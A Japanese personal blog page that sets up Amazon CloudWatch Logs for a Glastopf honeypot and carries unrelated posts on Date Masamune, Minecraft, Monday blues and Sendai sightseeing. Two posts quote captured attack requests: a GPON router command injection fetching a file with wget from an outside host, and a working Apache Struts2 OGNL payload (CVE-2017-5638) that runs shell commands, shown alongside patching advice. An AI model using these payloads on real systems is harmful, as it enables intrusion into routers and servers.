ハニーポットのログをいつでもどこでも見たいのでAmazon CloudWatch Logsを設定しました
ただ、今はログを見る際パソコンを広げて、見るというスタイルで、いつでもどこでも見ることができるというわけではないので、いつでもどこでもハニーポットのログが確認できるようにAmazon CloudWatch Logsを使って、ブラウザで確認できるようにしたので、その手順をご紹介します。
- Amazon CloudWatch Logsとは
- Amazon CloudWatch Logs設定手順
- ステップ 2: 既存の Amazon EC2 インスタンスに CloudWatch Logs をインストールして設定する
Amazon CloudWatch Logsとは
Amazon CloudWatch Logsは、AWSのCloudWatchを使用して特定のログをモニタリングできる機能です。
既存のシステム、アプリケーション、カスタムログファイルを CloudWatch ログに送信して、これらのログをほぼリアルタイムでモニタリングできます。これにより、システムとアプリケーションの理解と運用を向上し、ログを耐久性が高くコストの低いストレージに保存して、後からアクセスできます。 Amazon CloudWatch(AWS リソースのモニタリング)| AWS
Amazon CloudWatch Logs設定手順
Amazon CloudWatch Logsの設定手順に関しては、ほぼAWSのサイト通りに行えば問題なくできるのですが、Ubuntuでの設定手順が記載されていないので、そのあたりを含めてご紹介します。
ステップ 1: IAM ロールまたは CloudWatch Logs ユーザーを設定する
これはもうほぼ上記の公式ドキュメント通りに行いました。
AWSコンソール画面からIAMを選択し、こんな感じでロールを作成しました。 ポリシーは、「CloudWatchLogsFullAccess」を選択しました。
ステップ 2: 既存の Amazon EC2 インスタンスに CloudWatch Logs をインストールして設定する
Ubuntuの場合、yumコマンドがないのと、yumをインストールしてもリポジトリの設定等が煩雑なため、下記コマンドを実行してインストールしました。
$ curl https://s3.amazonaws.com/aws-cloudwatch/downloads/latest/awslogs-agent-setup.py -O $ sudo python ./awslogs-agent-setup.py --region ap-northeast-1
二つ目のコマンドを実行すると、対話形式で入力を求められるので、それぞれ入力していきます。
# sudo python ./awslogs-agent-setup.py --region ap-northeast-1 Launching interactive setup of CloudWatch Logs agent ... Step 1 of 5: Installing pip ...libyaml-dev does not exist in system DONE Step 2 of 5: Downloading the latest CloudWatch Logs agent bits ... DONE Step 3 of 5: Configuring AWS CLI ... AWS Access Key ID [None]: XXXXXX AWS Secret Access Key [None]: XXXXXX Default region name [ap-northeast-1]: ap-northeast-1 Default output format [None]: Step 4 of 5: Configuring the CloudWatch Logs Agent ... Path of log file to upload [/var/log/syslog]: /opt/myhoneypot/log/glastopf.log Destination Log Group name [/opt/myhoneypot/log/glastopf.log]: Choose Log Stream name: 1. Use EC2 instance id. 2. Use hostname. 3. Custom. Enter choice [1]: 1 Choose Log Event timestamp format: 1. %b %d %H:%M:%S (Dec 31 23:59:59) 2. %d/%b/%Y:%H:%M:%S (10/Oct/2000:13:55:36) 3. %Y-%m-%d %H:%M:%S (2008-09-08 11:52:54) 4. Custom Enter choice [1]: 1 Choose initial position of upload: 1. From start of file. 2. From end of file. Enter choice [1]: 1 More log files to configure? [Y]: N Step 5 of 5: Setting up agent as a daemon ...DONE ------------------------------------------------------ - Configuration file successfully saved at: /var/awslogs/etc/awslogs.conf - You can begin accessing new log events after a few moments at https://console.aws.amazon.com/cloudwatch/home?region=ap-northeast-1#logs: - You can use 'sudo service awslogs start|stop|status|restart' to control the daemon. - To see diagnostic information for the CloudWatch Logs Agent, see /var/log/awslogs.log - You can rerun interactive setup using 'sudo python ./awslogs-agent-setup.py --region ap-northeast-1 --only-generate-config' ------------------------------------------------------
ステップ 3: ログの確認
最後にAWSコンソールのCloudWatch画面でちゃんとログが表示できているか確認します。
すると、こんな感じで閲覧することができました。
僕のiPhoneで同じ画面を見るとこんな感じです。
流石にiPhoneの画面だと少し見づらいところはありますが、これでいつでもどこでもハニーポットのログが確認できるので、電車での移動や待ち時間で眺めてみようと思います。
関連記事
【書評】伊達政宗かっちょいいっ!ってなる『馬上少年過ぐ』
ゴールデンウィークに仙台に行ってから、すっかり伊達政宗のファンになったので、司馬遼太郎さんの『馬上少年過ぐ』を読みました。
- 作者: 司馬遼太郎
- 出版社/メーカー: 新潮社
- 発売日: 1978/11/29
- メディア: 文庫
- クリック: 3回
- この商品を含むブログ (18件) を見る
『馬上少年過ぐ』は伊達政宗の生涯を描いた短編小説となっており、ボリュームはそんなに多くないのですが、伊達政宗の生い立ちや生き方がはっきりと描かれていて、とてもワクワクする内容でした。
仙台の青葉城資料展示館に行ったときも伊達政宗すげーと思ったのですが、この小説を読んでよりかっこいいと思うようになりました。
いくつか伊達政宗のかっこいいところをご紹介したいと思います。
和歌や詩がうまいところがかっこいい
仙台に行って、初めて知ったのですが、伊達政宗は歌道が堪能であったということに驚きでした。
ただ、実際に政宗が作った歌をみてみると実に見事です。
いくつか政宗の歌を紹介します。
- 辞世の句(人がこの世を去る時に詠む歌)
曇りなき心の月を先だてて 浮世の闇を照らしてぞ行く
(意味は諸説ありますが、「先のわからない戦国の世を月の光を頼りに道を進むかのごとく、自分が信じた道を頼りにただひたすら歩いてきた」という意味です。)
- 公卿を招いた席で詠んだ歌
咲きしより今日散る花の名残まで 千々に心のくだけぬるかな
意味は、
桜の花は咲いたが、今、目の前で散っている。その散る花の名残りを楽しみながらも、(我らの行く末に)ついつい心を奪われてしまうのである。 伊達政宗の和歌と心底について
です。
もう歌のセンス高過ぎです。笑
僕もこんな歌をさらっと詠めるようになりたいです。
晩年自身埋葬する場所を決断するところがかっこいい
晩年、政宗はほとどきすの鳴き声を聴くため、経峰という山に山駕籠を利用して登るのですが、その際に、
(大学は政宗の家来です。)
と言って、自分の死んだ後、ここに埋葬せよと杖を立て、家来に命じます。
このときの政宗をこの小説では、
──しばらくたたせられたが、急に心細きご様子をなされて。 と、この瞬間の政宗を、いう。霊感が政宗の面上にさざなみだっているということをそのような表現でいっている。 司馬遼太郎.馬上少年過ぐ(新潮文庫)(Kindleの位置No.2157-2159)..Kindle版.
という表現をしています。
たしかに僕も実際に政宗の霊廟に行った際は、とても自然豊かで静かな場所だと感じました。
約400年ほど前にも政宗が同じ場所に立っていたということを思うと、すごいワクワクします。
その霊廟の写真はこちらです。
迷いのない生き方がかっこいい
なんと言っても僕が伊達政宗の虜になってしまったのは、その迷いのない生き方にあります。
重要な局面で政宗は、決断が早く迷いなく行動します。
例えば、父親が敵対する武将に人質として捕らえられてしまった際は、すぐ駆けつけ、終いには父親ごと敵を銃で打てと家来に命じる場面があります。
普通であれば、父親の命を考慮しなんとしてでも助けようとするのですが、政宗は父親と伊達家の運命を交換することはできないと感じ、
──殺すべきである。 司馬遼太郎.馬上少年過ぐ(新潮文庫)(Kindleの位置No.2505-2506)..Kindle版.
と決断しています。
また、弟の小次郎と対立していた政宗は、ある日食事に毒を盛られます。
ただ、これを未然に防ぎ、周囲に事態を告げ、
「小次郎は純良な若者である。しかしかれが生きているかぎり伊達家のわざわいは絶えない。かれはおそらく死ぬだろう」 司馬遼太郎.馬上少年過ぐ(新潮文庫)(Kindleの位置No.2538-2540)..Kindle版.
と言って、小次郎を部屋へ招き、太刀で刺し殺しています。
たしかに毒を盛られたとはいえ、普通であれば牢獄などに入れ、厳重に取り締まる程度だと思いますが、このときも政宗は迷いなく殺害しています。
家族を二度も殺してしまうという残虐さはありますが、このあたりの迷いのない生き方が政宗らしくかっこいいと感じました。
そんな感じで仙台に行った僕からすれば、大変ワクワクした内容となっている小説で大満足でした。
これから仙台に行く人におすすめの一冊です。
DASAN Network Solutionsのホームルーターを狙った攻撃(CVE-2018-10561)をキャッチ
5月6日ごろから急激にきている攻撃ログを発見したので、ご紹介します。
具体的なアクセスは下記のようなものです。
POST /GponForm/diag_Form?images/ HTTP/1.1 Cache-Control: no-cache Connection: keep-alive Content-Length: 119 Content-Type: text/plain Host: XXX.XXX.XXX.XXX:80 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=wget;wget -qO - http://YYY.YYY.YYY.YYY/gpon.php?port=80&ipv=0
/GponForm/diag_Form?images/に対し、POSTリクエストを投げていて、何やらwgetコマンドでどこかのサーバから何かを取得するような動きになっています。
これは、韓国のDASAN Networksが販売しているホームルーターの脆弱性(CVE-2018-10561)を狙った攻撃で、すでにExploitコードが公開されています。
下記のサイトでは実際にサンプルでExploitコードを実行し、任意のコマンドを実行している動画を閲覧することができます。
上記の動画でも紹介されていますが、少なくとも100万以上のGPONホームルーターが世界中で稼働していることが判明しておりますので、ご自身のネットワークでGPON製のものがないかご確認をお願いします。
とはいっても、僕は初めてGPONという会社を聞きましたので、そこまで日本では有名じゃないのかもしれません。 (逆にぼくがネットワークに疎いだけなのかもしれませんが。。。)
IoTが流行している世の中で、ネットワークに接続される機器が攻撃対象になってしまうのは、仕方がないのですが、怖いですね。。。
今さらながらマインクラフトに始めたが、孤独の世界に生まれてしまったorz
ヒカキンさんのマインクラフトの動画を見ていて、とても楽しそうだったので、前にダウンロードしておいたiPhoneのマインクラフトアプリをダウンロードしていて、放置していたのを思い出して、やってみることにしました。
ダウンロードした当時は何をしたら良いかわからず、何だこの糞ゲーはと思っていたのですが、ヒカキンさんの動画を見てある程度要領がわかったので、今は超たのしいです!
とりあえずワールドを作成してみて、どんな世界に僕は生まれるのだろうとワクワクしていたのですが、実際生まれてみるとヒカキンさんみたいな村がなく、途方に暮れました。。。
全然村がないです。。。
こっちはほぼ砂漠です。。。
仕方なく草原をブラブラしているといつの間にか夜になってしまい、何も装備を持っていない僕はなんどもゾンビにやられてしまいました。。。
何度か生まれ変わろうと本気で思いましたが、これはいかんと思い、木を素手で削り、とりあえず必要な装備を揃え、家を作るところから始めました。
そして、やっとの思いでできた家がこちらです。
天然の崖を利用して、そこを掘っていきなんとか家を作りました。
天然の崖で家を作ったということで、僕はゴールデンウィークで行った仙台の伊達政宗が築き上げた仙台城を連想してしまいましたが、まだまだ全然立派ではないです。。。
ちなみに家の中はこんな感じです。
もうほぼ監獄ですね。笑
ヒカキンさんみたいに村があれば、賑やかで楽しいのですが、僕の生まれた世界は孤独の世界です。
ロシアの小説家トルストイさんはこう言っています。
孤独なとき、人間はまことの自分自身を感じる。
この世界で生まれたからには、孤独ながらも自分自身を感じながら頑張って生きていこうと思います。
だれかマインクラフトに詳しい方がいらっしゃったら、アドバイスお願いします!
目標はとりあえずこの前行った仙台城っぽい家を作りたいと思います。
ゴールデンウィークもうすぐ終わる!サザエさん症候群がやばい自分のための対策まとめ
もうゴールディンウィークも残り1日となってしまいました。
僕は別に仕事は嫌いじゃないので、あまりサザエさん症候群にならない方なのですが、今回のゴールデンウィークは、祝日が重なり休日がだいぶ長かったので、さすがに月曜が憂鬱です。
サザエさん症候群とは
そもそもサザエさん症候群とは何なのでしょうか。 サザエさん症候群は別名ブルーマンデー症候群とも言われ、翌日が仕事のときに憂鬱になることの総称を言います。
うつ病は常に憂鬱な気分であるのに対し、サザエさん症候群、ブルーマンデー症候群は非定型うつとも言われ、一時的な憂鬱気分のことを指します。
ちなみに月曜日は一番自殺率も高く、多くの人が憂鬱な気分を感じていることが分かります。
サザエさん症候群の原因
サザエさん症候群の原因は、どの記事を見ても明確な原因は分かりませんでしたが、多くは下記の要因が重なって起こるとのことです。
- 週末の生活で生活リズムが乱れた
- 休日の楽しみから現実社会への気持ちの切り替えがうまくいかない
- 明日から仕事が始まるというプレッシャー
たしかに、僕自身このゴールデンウィークで生活リズムが乱れまくりで、今日も昼過ぎぐらいに起きてしまいました。 また、ゴールデンウィークの期間中、旅行に行ったり、フットサルしたりと思う存分楽しんだので、現実社会への切り替えもまだできていないです。
サザエさん症候群の対策
サザエさん症候群で検索すると多くのヒントを得られることができたので、ご紹介したいと思います。
仕事に対するハードルを低く考える
まずは、翌日仕事で憂鬱だと感じるときは、仕事に対する仕事を極端に低く考えましょう。 ポイントとしては、下記のような考えで過ごすと良いです。
- 家からまず出よう
- 今日一日を乗り切ろう
- 重たい仕事はしないでおこう
仕事後のお楽しみを用意する
月曜の仕事はどうしても憂鬱になってしまうものなので、仕事後に自分なりのご褒美を用意しておきましょう。
僕なりのご褒美としては、
- 映画鑑賞する
- ゲームをしまくる
- スイーツを食べる
- 読書する
- 寝る
などがあります。
みなさんも自分なりのご褒美を考えて、行動してみてはいかがでしょうか。
仕事後のお楽しみだけでなく、次の週末に楽しみな予定を入れておくのも、モチベーションが上がって良いと思います。
前日に思いっきり遊ぶ、または運動する
僕はこれまで翌日仕事の場合、気持ちを整える、体力を温存するという目的で、思っ切り遊んだり、運動したりすることがありませんでした。
ただ、他のサザエさん症候群について記載されているサイトや記事を見ていると、前日に思っ切り遊んだり、運動することで、前日ぐっすり眠ることができるとのことでした。
たしかに、僕の場合、仕事の前日眠れないことが多かったような気がします。
仕事の前日に思っ切り遊んで、疲れ切った状態で次の日を迎えてみようと思います。
休日に寝過ぎない
休日に寝過ぎない、もうこれは当たり前ですね。
休日だとしても、生活リズムを大きく乱さないためにも寝過ぎないことに注意しましょう。
寝過ぎないためにも、早く寝ることを心がけましょう。
思い切って早朝出勤してみる
どうしても満員の通勤列車が億劫だったり、出社したと思ったら電話がきて邪魔が入ったりと、いろいろめんどうに感じることが多いと思います。
それを避けるためにも、月曜日だけは思い切って早朝出勤してみるもありだと思います。
早朝出勤して、早めに仕事を片付けて、月曜日は早めに退社をして、プライベートの時間を楽しみましょう。
月曜日憂鬱に感じることが多いかもしれませんが、頑張りましょ!
Apache Struts2 の脆弱性(CVE-2017-5638)を狙った攻撃をキャッチ
Glastopfのログを見ていて、なんじゃこれってなったログがあったので、ご紹介します。
GET /index.action HTTP/1.1
Accept: */*
Content-Type: %{(#nike='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess?(#_memberAccess=#dm):((#container=#context['com.opensymphony.xwork2.ActionContext.container']).(#ognlUtil=#container.getInstance(@com.opensymphony.xwork2.ognl.OgnlUtil@class)).(#ognlUtil.getExcludedPackageNames().clear()).(#ognlUtil.getExcludedClasses().clear()).(#context.setMemberAccess(#dm)))).(#cmd='whoami').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','echo windows--2017'}:{'/bin/bash','-c','echo linux--2017'})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}
Host: XXX.XXX.XXX.XXX
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/56.0.2924.87 Safari/537.36
index.actionにアクセスしていて、Content-Typeに何やらコマンドっぽい記述が確認できます。
これはApache Struts2 の脆弱性(CVE-2017-5638)になります。
ここから確認できるのは、このアクセスによって攻撃対象が脆弱性を持っているかどうか探索しているようなアクセスということです。 またWindowsであればWindows用のコマンドを実行し、Linuxであればbashを実行するというような動きになっているので、汎用的に利用できるアクセスとなっています。
(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c','echo windows--2017'}:{'/bin/bash','-c','echo linux--2017'}))
脆弱性のあるサーバにこのリクエストを投げると、レスポンスに「windows--2017」や「linux--2017」が含まれてかえってくるようです。
こちらに詳細なExploitコードや攻撃方法について紹介されておりますので、興味のある方は参考にしてみてください。
Apache Struts2 の脆弱性(CVE-2017-5638)については、アップデートで解消するので、Apache Struts2 を利用されている方はバージョンの確認をしてみてください。
影響を受けるバージョン
仙台初心者おすすめ!観光バス『るーぷる仙台』
ゴールデンウィーク前半はベガルタ仙台対コンサドーレ札幌の試合を観戦しに、仙台に行ったんですが、次の日が1日暇だったので、観光バス「るーぷる仙台」に乗って、仙台の名所を回って最高だったので、ご紹介します。
るーぷる仙台とは|仙台市観光シティループバス「るーぷる仙台」
乗車券購入
るーぷる仙台のチケットは、仙台駅の案内所の他、仙台沿線の施設や仙台市内のホテルで購入できます。
僕は急遽るーぷる仙台で観光しようと思いついたので、近くのホテルフロントで購入しました。
ゴールデンウィーク中は仙台駅の案内所での購入は混雑していたので、ホテルで購入して正解でした。
本当はるーぷる仙台と地下鉄が利用できる「るーぷる仙台・地下鉄共通一日乗車券」(大人:900円、小児:450円)を購入したかったのですが、そのホテルではるーぷる仙台のみの「るーぷる仙台一日乗車券」(大人:620円、小児:310円)しか販売していなかったので、地下鉄も利用される方は仙台駅で購入した方が無難かもしれません。
いざ乗車
ホテルで購入したのち、僕は「メディアテーク前」から乗車しました。
ゴールデンウィーク中ということもあって、多少混雑はしていましたが、東京の通勤列車ほど満員にはなっていなかったので、楽勝でした。
移動中も仙台の街並みを楽しむことができて非常によかったです。
伊達政宗の霊廟「瑞鳳殿」
急な坂道を少し登って行くと、そこにありました!
瑞鳳殿!
豪華に飾られていて、感動しました。
周りの環境も凄い自然で癒される環境でした。
政宗さんが晩年死後ここに埋葬せよと言った理由がわかった気がしました。
伊達政宗さんの城「青葉城」
仙台城跡は仙台の高台にあって、仙台の街並みを一望できて、最高でした。
そこには青葉城資料展示館というところがあったので、入館するとちょうどCGシアターで「仙台城」を紹介する動画を鑑賞できる時間だったので、鑑賞しました。
仙台城や伊達政宗のエピソードが綺麗な映像で分かりやすく解説されていて感動しました。
もう伊達政宗ファンになりました。笑
今回僕は時間の都合上、るーぷる仙台では2回しか下車しなかったのですが、他にもいろんな観光名所を回ってくれるので、仙台初心者の方にはおすすめです。
